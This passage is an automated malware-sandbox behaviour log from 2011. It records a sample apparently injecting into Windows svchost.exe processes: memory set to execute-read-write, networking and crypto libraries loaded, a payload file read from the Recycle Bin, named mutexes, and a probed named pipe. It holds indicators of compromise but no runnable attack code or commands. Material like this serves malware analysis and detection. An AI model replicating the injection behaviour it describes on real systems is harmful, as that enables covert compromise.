Thread delayed Time: 0 TID: 9768 success or wait 2052647838
Thread delayed Time: 0 TID: 9768 success or wait 2052649672
Thread delayed Time: 0 TID: 9768 success or wait 2053766078
Thread delayed Time: 0 TID: 9768 success or wait 2053767922
Thread delayed Time: 0 TID: 9768 success or wait 2053769546
Thread delayed Time: 0 TID: 9768 success or wait 2054883299
Thread delayed Time: 0 TID: 9768 success or wait 2054883966
Thread delayed Time: 0 TID: 9768 success or wait 2054884673
Thread delayed Time: 0 TID: 9768 success or wait 2056005542
Thread delayed Time: 0 TID: 9768 success or wait 2056007565
Thread delayed Time: 0 TID: 9768 success or wait 2056009748
Thread delayed Time: 0 TID: 9768 success or wait 2057120872
Thread delayed Time: 0 TID: 9768 success or wait 2057122831
Thread delayed Time: 0 TID: 9768 success or wait 2057124849
Thread delayed Time: 0 TID: 9768 success or wait 2058239251
Thread delayed Time: 0 TID: 9768 success or wait 2058241147
Thread created PID: 692 TID: 1760 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2138837187
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2138847524
Thread created PID: 692 TID: 1976 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2246196338
Thread created PID: 692 TID: 1004 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2249250172
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2249294826
Thread created PID: 692 TID: 3964 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2357131646
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2357133027
Sections
+ General
Start time: 05:48:06
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost -k DcomLaunch
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
+ Sections
+ General
Start time: 05:48:07
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost -k rpcss
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
c:\windows\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 3 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown F60000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown B00000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit DB0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2 AF06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
416 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 AF0639
392 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2320 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2328 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
424 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2648 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3176 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3216 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
914 0s success or wait 822 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
416 968 success or wait 0 AF0279
Memory Activities:
+ Memory attributes changed
PID | Filepath | Base | Length | New Protection | Old Protection | Completion | Count | Source Address
968 | C:\WINDOWS\system32\svchost.exe | 7C90CFEE | 2000 | page execute and read and write | page execute and read and write | success or wait | 2 | AF05EC
968 | C:\WINDOWS\system32\svchost.exe | 7C90D76E | 2000 | page execute and read and write | page execute and write copy | success or wait | 1 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | 7C90D76E | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2C8B
968 | C:\WINDOWS\system32\svchost.exe | BAF6E20 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2C8B
968 | C:\WINDOWS\system32\svchost.exe | 7C90DF1E | 2000 | page execute and read and write | page execute and read and write | success or wait | 2 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | BB10A90 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2CA1
968 | C:\WINDOWS\system32\svchost.exe | 7C90DC5E | 2000 | page execute and read and write | page execute and read and write | success or wait | 2 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | BAFF2F8 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2CB7
968 | C:\WINDOWS\system32\svchost.exe | 7C90D2EE | 2000 | page execute and read and write | page execute and read and write | success or wait | 2 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | BAFCF58 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2CCD
968 | C:\WINDOWS\system32\svchost.exe | 7C90DB3E | 2000 | page execute and read and write | page execute and read and write | success or wait | 2 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | BB10168 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAF2D09
968 | C:\WINDOWS\system32\svchost.exe | 7E418BF6 | 2000 | page execute and read and write | page execute read | success or wait | 1 | BAE95DC
968 | C:\WINDOWS\system32\svchost.exe | 7E418BF6 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAED314
968 | C:\WINDOWS\system32\svchost.exe | BAFC210 | 2000 | page execute and read and write | page execute and read and write | success or wait | 1 | BAED314
968 | C:\WINDOWS\system32\svchost.exe | 3D949088 | 2000 | page execute and read and write | page execute read | success or wait | 1 | BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2081175280
Thread created PID: 968 TID: 416 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081179567
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081182631
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: F60000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2081182950
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2081184410
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2081185773
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081187346
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2081190446
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2081191924
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2081201411
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: B00000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2081207402
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2081214246
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2081223126
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2081354693
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2081357135
Thread created PID: 968 TID: 392 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081363656
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2081365270
Thread delayed Time: 0 TID: 914 success or wait 2081366154
System info queried Type: ProcessorInformation success or wait 2081366479
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081366882
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081367726
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081367990
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081368701
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081368963
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081369273
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081369792
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081370052
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081370904
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: DB0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081371246
System info queried Type: ProcessorInformation success or wait 2081372442
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081373645
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081373941
Thread created PID: 968 TID: 2320 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081375583
Thread created PID: 968 TID: 2328 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081378325
Thread delayed Time: 0 TID: 914 success or wait 2081380611
Thread delayed Time: 0 TID: 914 success or wait 2081381011
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081381193
System info queried Type: ProcessorInformation success or wait 2081381788
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081382194
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081383044
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081383305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081383690
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081383947
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081384257
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081384854
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081385111
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081385633
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081385967
System info queried Type: ProcessorInformation success or wait 2081387163
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081388397
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081388702
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081389092
System info queried Type: ProcessorInformation success or wait 2081389674
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081390079
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081390926
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081391187
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081391567
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081391825
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081392132
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081392729
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081392988
